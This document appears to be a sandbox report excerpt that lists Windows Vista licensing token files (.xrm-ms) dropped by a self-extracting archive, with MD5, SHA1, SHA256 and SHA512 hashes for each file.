SHA1 4f764f31aaae768ba23dd90d3f10998630d64be5
SHA256 a3ff40953151990c4be116c37c953f9791a15a45d66b202375fd6bfc79c49767
SHA512 7a0444be3a87261e70e74e2e4ef593c8b3044fa68db96443d900ed21a2dda852e198f7c3fe199f26bbc487d742c9b4f4c5e2c9a581a9c30cddad1d1aa9d10951

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Forever\HomeBasic\tokens\ppdlic\parentalcontrols-ppdlic.xrm-ms

MD5 4c2025b14f08d643aa7465dea0470a03
SHA1 e1cbadeab3952878ea6b82b8afc6c7347d951f68
SHA256 dc11df1c1cadbfc49357abbf476128b5652a9f2880242aa27d7bc98890eaaa9e
SHA512 909f37fb9541990a271ff630a63b65a64211191d891ca72482c8f01eae064a215828a59d4f82c715dec2a2b63b6176a532cd91c4bd05d3054e87aedcbed86cd2

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Retail\Professional\tokens\ppdlic\parentalcontrols-ppdlic.xrm-ms

MD5 8e7bf19a3009a50f455906bfe095ecaf
SHA1 96de559c2c951e85655fc46778f0a629e9f1f4d2
SHA256 e66c0de107e1cba37a354098343d4857df21eb67190034bf2953d28708e1b87f
SHA512 d106438fc42d6f1e37b8d813fd8ce5fbf6f38e738454876377694d0e515b9765fe50f48a91bfafca2d1174c1785ef10a09e0ecad06c6d769a36797231cc5e284

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\VistaOptimizer\HomeBasic\licensing\ppdlic\parentalcontrols-ppdlic.xrm-ms

MD5 98dfc2aeca9e436e0d6c7d90b36d7050
SHA1 001723cbefeb922274e169beee7a388ad34da66d
SHA256 f8ba7bee2bd32d762aa3c0533b829a49ef449acc666634e2d8d815b7d1c973d1
SHA512 be131db0aadbab937f0ed319270dcb9421442375a2ef868f0404ec21176a96f8d4d7ba8c132dffb7f1f0ad1b2e653f3114c9ffea928401615ef78e0b5ebb563b

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Forever\HomePremium\tokens\ppdlic\OMD-API-ppdlic.xrm-ms

MD5 ca5077b401e98a144924175e0eb753bf
SHA1 bf402dff736c087309f6697a0f4533cc448bbf2e
SHA256 0db143131f70cdbc66abb3ac82909476b172c09fb1fdf02167e85394d845dbd6
SHA512 4ac543c430634ac02c24914761af064222af86eb0e2d5f550088ea15daf6083f4ff6576ad1a11b08eff816280ad969b05574ddda3dc20ab4871d8c10d67fc271

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Forever\HomeBasic\tokens\ppdlic\NetworkSecurity-ppdlic.xrm-ms

MD5 9481971cd87bdc78d44d3e83a8554ddb
SHA1 ec2eef49ef452cf6d0c5c29680e362ce714fd79f
SHA256 2947d2d577fbbfc08b0aa803c64da29983fad4351c6f9c24859057d574dbb55c
SHA512 1665cf8e62219a00234ad189261d454d12a75582db96150b7cec7d30dbc6f348b3d02c7ba8f46a898eefb6d3583b2647f4809e586f868a7118f49ec557f03eb1

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Retail\Professional\tokens\ppdlic\NetworkSecurity-ppdlic.xrm-ms

MD5 e91794915e8177dc67df9b4442138a3d
SHA1 ce17317d9ae13218eb636917a3f1f2ba72301c2b
SHA256 d1ada3568ee707984233d710dfe4fd59f9014689b207b183e8d5b4f9300bea2d
SHA512 3f365890e97878509f3c6cdceb8abb32aff28258e78ddd65ee9c6fa381119018b489e27b2815eb2a5a43e8d11044046a92df0e8047516ab53000d72542d2991d

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Forever\Ultimate\tokens\ppdlic\NetworkProjection-ppdlic.xrm-ms

MD5 bf30e99805d4c77eb9dff61b46e149b3
SHA1 b3e899cea912a5c02179f7a3a93cfc9fd5581ee5
SHA256 3697a8dba337359c9fb2bd9788601cd25dd45f1e92d3ad0e94093d52daed1f5d
SHA512 bbad965c41af9aa535d7a37917d9213047d44a48cdc31dd901a7413b3ae3b53a2e7169f6d1a990c8a03da365534c974ddd0602cfb9e1e70409329fc5344e143e

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\VistaOptimizer\HomePremium\licensing\ppdlic\NetworkProjection-ppdlic.xrm-ms

MD5 85cc4685813cf776518084f72b2a3ad0
SHA1 c87b1342cd9f180f8900d9d98c90eee1577fd55f
SHA256 cf2f6215e5dc36ed5257f32f8ed1f874a9769c1c9c3452e0cdb2e6aa3d13eb62
SHA512 93b8a2844375162dfa7c798ee2ef4ba4f424f5c67a72ff3a8d0df0956c51b28b7f020fc39831d76d97f8ea83b3f957561d81a0160b8c4ee5a4aa2a608aedbdd9

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Retail\Professional\tokens\ppdlic\msmpeg2vdec-ppdlic.xrm-ms

MD5 dcfc82b2b18c7f8fac95243f76f0eff0
SHA1 7081fbd481377f9bb268550355e5d47542a64552
SHA256 3aaf88d0d10da70ee393cbe0a5c66f27e9ba3779a3592cb61c6b8400d605f18f
SHA512 face22677f1e3ff5d5e049a9c85a9cd709027cd6605e544a549e9fa835982ad84473c571297451ecc6b47b6bbb15818118e23b2469378c4d16e8ac8f5223f580

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Forever\HomeBasic\tokens\ppdlic\msmpeg2enc-ppdlic.xrm-ms

MD5 cce89cfb399eea5263fb314bbe8c2e04
SHA1 9db136e98df10d89112ca18b824e171d38e1374e
SHA256 6fc870783d0beefec80d7e9e224396c49899dfed97d93687cf41175922c7f6b4
SHA512 4a7e0e9ce787c1f053abcec25840d16f018a4fc1756769c2ff6735c25210c05f79a0bfd3fd720ce6fdd49e91a424e8379b4aaae5821eedc91de60ec947fc1bf1

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Retail\Professional\tokens\ppdlic\msmpeg2enc-ppdlic.xrm-ms

MD5 83bf3834593dec83944cec2b4cdd4aea
SHA1 cc729e8be652d32eb9e81dff81b74f2fd43aaecf
SHA256 1c1ae2b67538d878fc33e7eff8a428ddd7c419b3331941ddb8a1c230ef1e9c55
SHA512 bec210e885f3ee4c85e661b465433ad53853d0c3838235afd974cc4305432de63db0f860c571d2bba29795a3173ca3a22b4309e0536ecbca7b9f0e11a6debe3d

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Forever\HomeBasic\tokens\ppdlic\msmpeg2adec-ppdlic.xrm-ms

MD5 ef60ce48d1f50a99a2791bf1e06e98b5
SHA1 b77a4b9554e1db45300a1ba01388c6ad25fb2f47
SHA256 90eae28514fafb03ed6f2ebe481e87a3c79ed585004d217e942819a749489d4a
SHA512 c7e457a94f04d0bbd33a14df658747fc22a5e86326a8fcc394ccd38f6393a6e4cb72a0ddb515be312c3153cde4af5a9ab3b5723192e6409dad9e77734ea5d1cc

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Retail\Professional\tokens\ppdlic\msmpeg2adec-ppdlic.xrm-ms

MD5 1c9da7a2b1f5b7508e519d25cb436116
SHA1 21edc30a83c85b1aa5a0efcce1fb462bb0744fb5
SHA256 a1c723b12e58a2bf29a80f5dd9500a5a9383390d2bd6c9d557a0594bc45da59a
SHA512 7003614f93de3c7b586d3c1381df4f029af2a562097b8c4077ea7beae86da2d1e02818906793c3a58397f9ab6727f8132306d326446cc2dfc07e8a0f1ea73a14

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Forever\HomeBasic\tokens\ppdlic\msac3enc-ppdlic.xrm-ms

MD5 7571b605f7667ea2a9647d79b451254d
SHA1 f839bc40021cf75b67712b563bf73d9f92c98b5b
SHA256 55225242298ec4d5e08444c37c3620188ea9c90712997fa8f100258a2d4fdb40
SHA512 90f999d06b2ce16043f0b66b1980e8352dc464d8fc0eaa0392ff4b0e48460603e53a3275884e12c31bebb3e6496eae079e06271fa0d62d2514d20f0990dec93b

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\VistaOptimizer\HomePremium\licensing\ppdlic\MovieMaker-ppdlic.xrm-ms

MD5 3960ef775202d376ecf06dbfeeea30a9
SHA1 51e42ad6bf4b4b2f2bb863e639cfa6d148d16c56
SHA256 417d10de53c9841c0ac9becf0c176e49530a4f1503c117c69684b3c5ff240d8d
SHA512 c37100ebd230808a8fdaab0fa529012d2064e62574aecea69be6d454db24b679d6d8fd01e55e5137b3fec0acb9dc7b562e8fdf5f0ebf003da73c9ccbc953bc1f

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Forever\Ultimate\tokens\ppdlic\MobilePCPresentationSettings-ppdlic.xrm-ms

MD5 2ef9022ba4815e9916a2edf6452d7f65
SHA1 2075105dbfe63966124ca50d90197d0df71080b0
SHA256 5851aae51a4caa8c3a78fbe2c8fc0b449cc636852afe5cc387c0bc0df157fb48
SHA512 ddc20af271f933f2f926bfb8154eba8ca6e26bbc537d650d30c5c1809b758263a9a40f10ebe154a2141e1b41b0007db3bdbbcde8fef1b331afdd1ee2bf34ccf7

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\VistaOptimizer\HomePremium\licensing\ppdlic\MobilePCPresentationSettings-ppdlic.xrm-ms

MD5 78150da47691689042f84d8ab0a8c9f0
SHA1 40a04f083a946e2805b02590833ce8d1c4d386a3
SHA256 e92b09cc9bc9eb194dc003479a90cd8cb8b48b9d04edb370428b3ae9eb99a405
SHA512 905f3cf620c1ed10f29add32871ade55970735b0b0ce63e4cbbfccc9372ba159ee83b55fa5a70cccb2a9d1598ac3f83becffc4522d98d59dbef2718c2c914841

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Forever\HomeBasic\tokens\ppdlic\MobilePCMobilityCenter-ppdlic.xrm-ms

MD5 55b8cd78b187fbaabbfac9b7c782d67b
SHA1 4f82671d1ce83ddf276e290e58489f3a7ab4e46d
SHA256 e7c5bd87dd0f5b5760dfc239a92b7d3bf9de2eeda29d87d3a17bb318b4168300
SHA512 35b763d9d76cc7f3b1d286f567bcd7b3030b57fc056cad12d3f8a10480648da5ff68eaa93057d1e6d6d564b31043b5aaaa3dcdfa92b62aec125cd96aff24037e

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Forever\HomeBasic\tokens\ppdlic\MicrosoftWindowsSafeDocsMain-ppdlic.xrm-ms

MD5 e4f69b57907917207972fd5caa818231
SHA1 15f72cc0c21de6a39ee6185551b6e5c3e4b37228
SHA256 173c434b9a41aae5353a9b725e6c63c31b29906a08a12324d7bbe504aadbed8e
SHA512 2cc39ec59d17683b6f17b5b25f5588faa2055dc5944d94866410f0ed748bb900c1b088681df6bc224bdb1c9d4daccbf6e1b06afa64bd8f38e62b7801c7cfdea6

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Retail\Professional\tokens\ppdlic\MicrosoftWindowsSafeDocsMain-ppdlic.xrm-ms

MD5 00aaa8cb8fbcb68a272c3b1d5826f88c
SHA1 f7592d84ce0f7bb77aad637c8af27cd3271755c6
SHA256 fda5c8704ec12e4040bd3935cf46d6cb66667109a7abdd090a530d1117594c3f
SHA512 a366696ff53244348f4b2a721e3746942f43420332ba8c7e13845500ae224e4ec77ea3faa7ca070bdaadcd4aabce01cea04a9bebf487f9b80f4b368f497fa804

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\VistaOptimizer\HomePremium\licensing\ppdlic\MicrosoftWindowsSafeDocsMain-ppdlic.xrm-ms

MD5 36ad4eee439e9d02eefe0f2074f47e2c
SHA1 508622c6f2cfa6eea54e696e385b90254c725288
SHA256 3439eff764956c1af8a1778432e492eea427768bb63b0c2a7a220c232ca68a6e
SHA512 54bb1ef29abd2722c5d5e8f4d0428a480160b10f3984bb2e8f2628fbd966faad4bb75aaf282185f9113c1a7705253efce2f31b0870fae2a580a8d0ad34fa491f

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Forever\HomeBasic\tokens\ppdlic\Microsoft-Windows-QWAVE-ppdlic.xrm-ms

MD5 3a7d973e5a523ba81b0a99dcb412c4bb
SHA1 e405c2b9078ca0091c8f1a25ca18fa2507d7efe6
SHA256 d95f9fa4f9139e5c4857d45dab4e9f6a2792532da188cd5e9ef64e39100f9aa0
SHA512 8b0025f60e076a3ba3e0a316300a486dc5390eebe0c91584435026962abbd4c394aecd9b3b9d8351ef25f1cde82f6aea2049abf7dc869401420fcd09e0e7d747

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Retail\Professional\tokens\ppdlic\Microsoft-Windows-QWAVE-ppdlic.xrm-ms

MD5 5133666a540e8d6b70240d2e44b39d64
SHA1 950ca68dc88d3f60de4689eb665a94c83e81e602
SHA256 f2b2e2ebd77ce9ebbfa0a2395107d8cbb469aef657bab90487cd5fa0dfd93daa
SHA512 4b15a339b0d0e60fb8a0a66d92fa893787b587bbe4654d06c7120b8f0986aae3d2656fb14731e6e0e456d7f569b4600d04c88703969a4d5f51b0b6e7f5ea27ab

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\VistaOptimizer\Ultimate\licensing\ppdlic\Microsoft-Windows-OfflineFiles-Core-ppdlic.xrm-ms

MD5 dcabbaefad41b57639ab40f6549b092b
SHA1 56a16b2c5a4230fd064ab320ebe1595ad7fe1485
SHA256 7125bccd953808e3e41cb535e6fc41ac68e7131aff7812f2ffaab61fea5081b8
SHA512 24ce408a4486118de9ccc27c44e2828cf7a4339529a3c51e44f0bb08ac414a0c4c5a0c91a15315e444fc60194c7bfe25d34b93caf938f76f41ab478e31c04bb0

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Forever\HomeBasic\tokens\ppdlic\Microsoft-Windows-InternetConnectionSharingConfig-ppdlic.xrm-ms

MD5 496c412bf6aa299d21e9a86898ca8569
SHA1 a38443d079cd05e93233750490383fe0df40dbd1
SHA256 cf5db87c483b03dcb1161673e60512873dd0c3c398641617f1d257b82a576c0a
SHA512 42e6e0e8720bf968834d142237c33c56a2bdab15ee4bb7014c42477adba82fed972e563a48af1e216431046fd9d30f88dd66bdb085131f6f02d956519f5d113b

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Retail\Professional\tokens\ppdlic\Microsoft-Windows-InternetConnectionSharingConfig-ppdlic.xrm-ms

MD5 8ecc877351ceef3516e51ef7e3b10b8f
SHA1 a81637e8ad25797a59fb6ef9bb66751ecca6845b
SHA256 c7db0b64ad1d626514f13d56c2096258314ab861a806925a63854ca4d73d7f98
SHA512 dabdbb3a45f967b51efa531951f23657c126328a9f11b7918aefebe08dbb42cd571d28d457ebbffcd4a1e4f648c7c3ab747e70f3c05b26acc22cfa0c520c5841

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\VistaOptimizer\Ultimate\licensing\ppdlic\Microsoft-Windows-InternetConnectionSharingConfig-ppdlic.xrm-ms

MD5 004edc151be054f27529bac1e91075f8
SHA1 b79428ab8a224619f8d8dbae49268ac9406ac6f5
SHA256 c6de9449971090c3afa9a1de1e3e112a5e1b9227f7301b032ceaf9eb1b1e4458
SHA512 8add1453dd69b7a978743e4a2669e5cde159debf307a610ddade599f5d304ea3b5918d0dcc4f2cdfeec2b9dd6ad7fbdd391b1161361dd8fd2969f980b8778c1f

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Forever\HomeBasic\tokens\ppdlic\Microsoft-Windows-Fax-Common-ppdlic.xrm-ms

MD5 254d4a7871d284c00755874ccf99303b
SHA1 b7ccebafc995ed9b7ff270ff8ef7c0fd85888770
SHA256 959d5c6899d354daccf6ebde5bef5171a6321dd5917ec71a3731c5a59db084ba
SHA512 cd4ed15b4256db8ee913b861fc1f4154bf26afc59a46bb1c2881982642aa5a2fe4362e1ebe61bf6bcb454b67ff375c46650ff9294eaa2c6ccbb44aa9b70635e6

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Retail\Professional\tokens\ppdlic\Microsoft-Windows-Fax-Common-ppdlic.xrm-ms

MD5 5a612699592c4b55612f9a7564d5e8e7
SHA1 cac3ffac98ac5e78619bbe482fc23749059563a0
SHA256 47393fc6dfadd9d018a95c28b437af71cea1a0036408791d59ce527742c9f486
SHA512 cda713d6376d19b9c50bf617de8a844f4eb0dbb207edfdbf90d29be9cdb6ea9a1b53671b10c3eaa343baf658df298a5bca7165d1ab14ea13091ff2220c363200

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Forever\HomeBasic\tokens\ppdlic\Microsoft-Windows-DOT11PREF-ppdlic.xrm-ms

MD5 4b0b6942926577bd62e8a23445b245f0
SHA1 4b3e78e94d920c4bf8ee4e199651dd40696934e6
SHA256 1f51eab331bf1c95284b17f583b730a157517123af4e4ecad700007b05aa615e
SHA512 a51377cc34133469f3f31feb55f4709f6922a5cfa0fb948804ccec7029dfbf1af5d101f6684790ace879be7324670d4f011eaa889162ebddaa5de302b48198da

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Retail\Professional\tokens\ppdlic\Microsoft-Windows-DOT11PREF-ppdlic.xrm-ms

MD5 bb2c62953a247c5925ef46410778617c
SHA1 d2d479710de7deadb72592d0c041d948c1f2b408
SHA256 37ee58d8565a38240e783268176746e3d3c1f50e54b0aaf4cb8f9d6aaa40afed
SHA512 8fbc4eb4bc73e4ec2502c0d2099f66eb5251753342aaf125f0c41febca12db17e1e3edcda7b74ca2c8bd2c62c258602ab9d1c51278535eb344575ba674f8cec0

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\VistaOptimizer\HomePremium\licensing\ppdlic\Microsoft-Windows-DOT11PREF-ppdlic.xrm-ms

MD5 a2ebd763803fda481ba8d78904b8e999
SHA1 d08c0e77af6bed634e3344597472015cef44a137
SHA256 26d95c2de97ebfa6b9bd62cc0dc3c7262f19cfa856d94e2d00adedf7c2d44d60
SHA512 8659ed9dbc0dc71552470d53c3bcc6487bbfa201c519cfb1f3b796d810496fb15da646ffe824e244c5ab552041513f9cc0b412e3e2989adbfc4ce759d84d5956

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Forever\HomeBasic\tokens\ppdlic\Microsoft-Windows-DesktopWindowManager-Core-ppdlic.xrm-ms

MD5 5528b6d1c60f088625d304690d8296ab
SHA1 e0937bad179bac3e1fff833fefcca453b4d3d0f0
SHA256 2f3210da0d80a3e02f17527da31058509c4612c7ffa94c92276bb6175633ea8a
SHA512 96a5c6521afa4f241be0e88e14a3f5a365293fa45599c1f55b81fddb0e71426bbe0b0026eca196e9c6462c7275dce0a942490c255cee7aa7c32925d3058d9e3d

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Retail\Professional\tokens\ppdlic\Microsoft-Windows-DesktopWindowManager-Core-ppdlic.xrm-ms

MD5 ad026fb805517c0cf9edda42f6ea4c7d
SHA1 4e788be07124ded88bdc05f5e31b14dea4d47e06
SHA256 f5bfa1cfe94b0470fc8a3ba18019d90f4225c9cbda196c10940e346d7aeb8240
SHA512 8fdec5a61c696db9726f42c3a35a2038131cec5f14bea3cd0c935e9096f2fc55903417aa8753961d838713b7d3ce51ab856974a170228c84ce6b7317a6ac4424

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Forever\HomeBasic\tokens\ppdlic\Microsoft-Windows-Core-ppdlic.xrm-ms

MD5 b206c05031dda75f4eafdce12553547a
SHA1 722ac92fc1d39be5afa2e0284ba79305d22090ed
SHA256 3a5d2084ae0b79d4f362049d5eb163264fc8058acb6ffb561f41a648926ab154
SHA512 79d5b6ac6b3036479e268b47a2c7c322d991b596503d45aa16fc2a5289c230968bdabfde6de96a68d987644b09a6a2d7498997d6bcea4c6a1f2134af131cc27e

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Retail\Starter\tokens\ppdlic\Microsoft-Windows-Core-ppdlic.xrm-ms

MD5 0f3f2fee079142ccb1b47b9ce7fa8c27
SHA1 8d1b2331241bf8f950f3135704f0683726844667
SHA256 20935b33839cfecf508eb0750f8f6316ef05691480c97a70749a1259455e036f
SHA512 06b8bdb75a2310b122d39182fbf958d39387c278f5b5e6fb6fda160a058257908665d03ecdf94399c31f482d086057ce4203b18d3c77912b6f9b1c96d01d6d2d

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\VistaOptimizer\Ultimate\licensing\ppdlic\Microsoft-Windows-Core-ppdlic.xrm-ms

MD5 db42bd1f9f070d51f164ebfd4f3b6b73
SHA1 9be4afb376746da087e0213b3a61b9ab5839d3db
SHA256 ff66ec48527685ce2db54495908800ec0bb31c6d215b83e03728f3eae2abdadd
SHA512 7e84c91aef83b60bf8b168d2a5a8d6076a7a8c63c8427b5bd013c37f6a246b19572a3d87b850a15eff2735eaebf5352c6d67afe2e09a236d2887d53a3f81c8f7

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Forever\HomePremium\tokens\ppdlic\Microsoft-Windows-AuxiliaryDisplay-ppdlic.xrm-ms

MD5 7102b57189ffc359989cd5c5dd848c0d
SHA1 4a10f1df5284b1d949ddf5a0f9788b76b6cc8f58
SHA256 4b6eb0b0faa90780658301f26a4b4fcc2ad95ff56dc264c13402c430ae13f48f
SHA512 f745461d584535c40442b2ffa31464efcced05b775f2fc91daa03d1a1747f69570dc107746393067a6e362e7d4ac4f1c201d4cb0c6e54cbefe059f5489a69ccd

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\VistaOptimizer\HomePremium\licensing\ppdlic\Microsoft-Windows-AuxiliaryDisplay-ppdlic.xrm-ms

MD5 cfc8a17c78a832b037ef88df42e74129
SHA1 74b5d2857222e83dd8f2e55068388d3553cbc0f4
SHA256 3f52bec95945c4e015520df3f7d26d67067ac7ef207038d67d4486d2ebb676c5
SHA512 34ac48bc3a34841a2054f55b226061846797f9a93ad878f7db24ba4b9f074e17fdedac4365fcee5bcc0d10d23eccac14f1c263c6778ee68e0e8664e1e8420b2e

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Forever\HomePremium\tokens\ppdlic\MCLicense-ppdlic.xrm-ms

MD5 7b56436619b89659e398e4a4e1601e29
SHA1 bb63a8630808e7d8dd31a839be1b02889bfb4e53
SHA256 d74444b75681c2a6bf3a96a65a2870c86032127dc0c7595e4817cb86387ccc1c
SHA512 de0459fc8aa339420810da590c1b598d9f9607c996fedc1f3daa0d195e2a45954f8132b052cb3893d2fe4288dd231abfbf16027913569c446e910801f236f0f5

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Forever\Enterprise\tokens\ppdlic\MathRecognizerEventsLicensing-ppdlic.xrm-ms

MD5 b8c5ae3dc47030cec78d84098e519227
SHA1 e19d21e0226cc18575144080359f10f6167c413e
SHA256 9e4393351a92b6482eab7ddc0f538bbb9ee10b462860dc5b472d6877f83b9351
SHA512 eaceca2d41681f0ce6b9ce24507c38d0d1ef59c6fed8bb81f2274392114a564148e16e0dd9ff93932fb9c96ba1dd987d034cb03100317eef9268a468af3c1196

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Forever\HomeBasic\tokens\ppdlic\LSA-License-ppdlic.xrm-ms

MD5 9d7c5200b61f953120941ac7fcd7fcf5
SHA1 4049deefd1b74d426007b92142a4d0f0741744b1
SHA256 12d9d6d044720d681bb98ff805341c3db1144ea1dae7ca0c3455a898ba415ecb
SHA512 e2e8e79aa9f0e7c2d0f6f7dfa2f6839fd2390b24a3944353c3d693fb4cb20d777df6c6fa63d0177ce3fbd5495085ccbd513ded6ebb8f2e2af0e7d070dc6067ce

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\VistaOptimizer\Ultimate\licensing\ppdlic\LSA-License-ppdlic.xrm-ms

MD5 693ce90f47a550bad0ef38fa5597ba97
SHA1 496d58bb638d8d13174415841cb9138492bed0f3
SHA256 f3f1bdf5524cacb5f5b62f7d4e484757ea485b2a8463d1d39fe19fb7492aa7f6
SHA512 bc7befc8c60100a4d1658f238a7486979f5a4df86e22fe9471f803414fd763cdd95f7cc57c442a1d78d6bba26842688b9c7469ad951cdda34970a212d6aeb491

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Starter\tokens\ppdlic\Shell-InBoxGames-SpiderSolitaire-ppdlic.xrm-ms

MD5 740a437dd1b2b21992e093cc0a2d5808
SHA1 19a224aaa96e20e967d564eee89da62f40ba1065
SHA256 d3424c420b5b58401d4b1c1c74e39ae1ea5098932ed8729ef8bfab57d817dbbc
SHA512 5415273fae692a282dfbc606f034f70a0f7238c4978b5f6ee43318c7cd9d96970d425f822ec2c29f50aa2a160ae3f5884c501616fda53c06ad3856311039c64d

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\VistaOptimizer\HomeBasic\licensing\ppdlic\Shell-InBoxGames-SpiderSolitaire-ppdlic.xrm-ms

MD5 21beed946490bc6c16011840bf5073a5
SHA1 e1156a0e883f7682c09f3688b9e4113726320b7b
SHA256 9f691e04bdd47408c75aa6136017a30d18021e2a3fe88bc822c1aa0e5b69097c
SHA512 b9da8a965b7a554c9594150ffec35bcea224f50af9e7942711a1e917f6b601edd6d38d7b5c547799ed9684cca62d4d6d4b60e5120e9a0b845f10946943330e40

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\VistaOptimizer\Ultimate\licensing\ppdlic\Kernel-ppdlic.xrm-ms

MD5 010255f2a744182d2e7de3cf62a04386
SHA1 3d62aa84dbb22854c16032e775d564f76ebe18be
SHA256 ef23ea9ffad3404a4ca42561cb400ee9a6e59fe8fa076d0af87e93c50371a0c9
SHA512 4cd2a03581d94a875dfc8f4fd9248aba76f9dbdeaf8a528d9ea589862cb2305eddeb85cbaa5eeabf13366e07722018cae322975fd46a03cfd46928588a1a9326

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Forever\HomeBasic\tokens\ppdlic\IASLicensing-ppdlic.xrm-ms

MD5 4280e9e5bc22508620a384c43817e75a
SHA1 b894b6ff5cd8eb750de50c66d33c8b02107f80b2
SHA256 6204106d9744b056950c05d8eee1367e1aad1ec6a8a5a597b26a29ecd121c6a6
SHA512 ded077eb0ddeae28cf273d126c87c80295144d175adef0263f4285cde1ef3dd0ac3383b6db7e24320a694bb396b558d1a80ef4be05b2f9ac3905e3c3e93cf50e

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Retail\Professional\tokens\ppdlic\IASLicensing-ppdlic.xrm-ms

MD5 0821fc1abadb7004e66049a21c7b305c
SHA1 53e459663c2f8f13bbad30896fd34298c2df7742
SHA256 63f19f882cdd7871911562ec2f05d53c58ee391746de7bd9a97452615cd9ddf5
SHA512 d2f5bb62cf28887ab2bfd4426325e3ff86fefc68385ab1709f56e623a9946b82c50113360a2c26b988b59e967eefa8ba9c3d6bd639339b72a80094bab9b6d302

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\VistaOptimizer\Ultimate\licensing\ppdlic\IASLicensing-ppdlic.xrm-ms

MD5 145bc852020a15cbf1c266f227d24175
SHA1 90f7d299e3eed3dc508f35e008896c08169137bd
SHA256 def11a1ab9180f235d2233afdfff1b95d3cd9d5861560cce81876e7b2f463012
SHA512 f7d16e109ea05977e8cc2e78d10c2a91da43b9c16b947bef5525e64e636514078f030f454deb6e2cf8fbda8851ba8d9e2628c3b85b0b06dbf852b462e594f56b

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Forever\HomeBasic\tokens\ppdlic\GroupPolicy-License-ppdlic.xrm-ms

MD5 fa5086f58e8f932241c11aa95793e2c1
SHA1 13ded8cba00f73b61714ebc1522ee4ed76eb39c6
SHA256 39b1824c863f54359c7db73c3ab31f9f02cba1d7b468f21b017224dc8194ed1b
SHA512 89dac1fafecdf1359ebf549715deb8fa63131c5cb3a5a01cb64d6d601501f7bb57b881d4d93ba57028aac95f8a4d5b91927d79f7c250de173b87edf3820330e7

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Retail\Professional\tokens\ppdlic\GroupPolicy-License-ppdlic.xrm-ms

MD5 33b91d1d83c99f4f172a80792de08696
SHA1 ce501b6e91d96e0dea94be3900dd337ad48e0b24
SHA256 b2fd7d6361693b58f7cd5264dd9dd8ae46007d45b747842047959ac6ad513ed2
SHA512 e5dd0e8f8439973036510d91007fede419e2d6cec88de8c428de05e47bb23e8124b74a57f0648c8451ea73377316d0e2afb24beedfa4c961a78285dddf0ebb9a

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\VistaOptimizer\Ultimate\licensing\ppdlic\GroupPolicy-License-ppdlic.xrm-ms

MD5 8aa272b295a648066b2a4ed3ce735cc2
SHA1 5fad7788cffac50ecbdf06bb3cba1e0460528b02
SHA256 240942b86d2d82e5244c7a30cebeb53f9648fe8d3bf04d39c01340c715170aca
SHA512 415e8dfc46f3f7f06cbfc5775818ea95c865b3fcbec1615f36598b68e396fae1de32468632c4b192d7d7b442574381378f306d0a97b631e1ba55abd1569af398

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Forever\HomeBasic\tokens\ppdlic\feclient-ppdlic.xrm-ms

MD5 68c4a03617e4f26e0c0c9a4b24859e9c
SHA1 76304e5d962d327e8b1dc169ccee871a325911a2
SHA256 36247a9583ef91045c268cc43e6111d901043c977dc0357cbc0c1bce412085c7
SHA512 50928957f3a76ec73c596ac7098a0963fcdd383ebc952ac2d0dc3f7cb508f1cf7e376d74532091cadd57a735e6b3744e593ca0f21557a29371ea6bb8a3c1368f

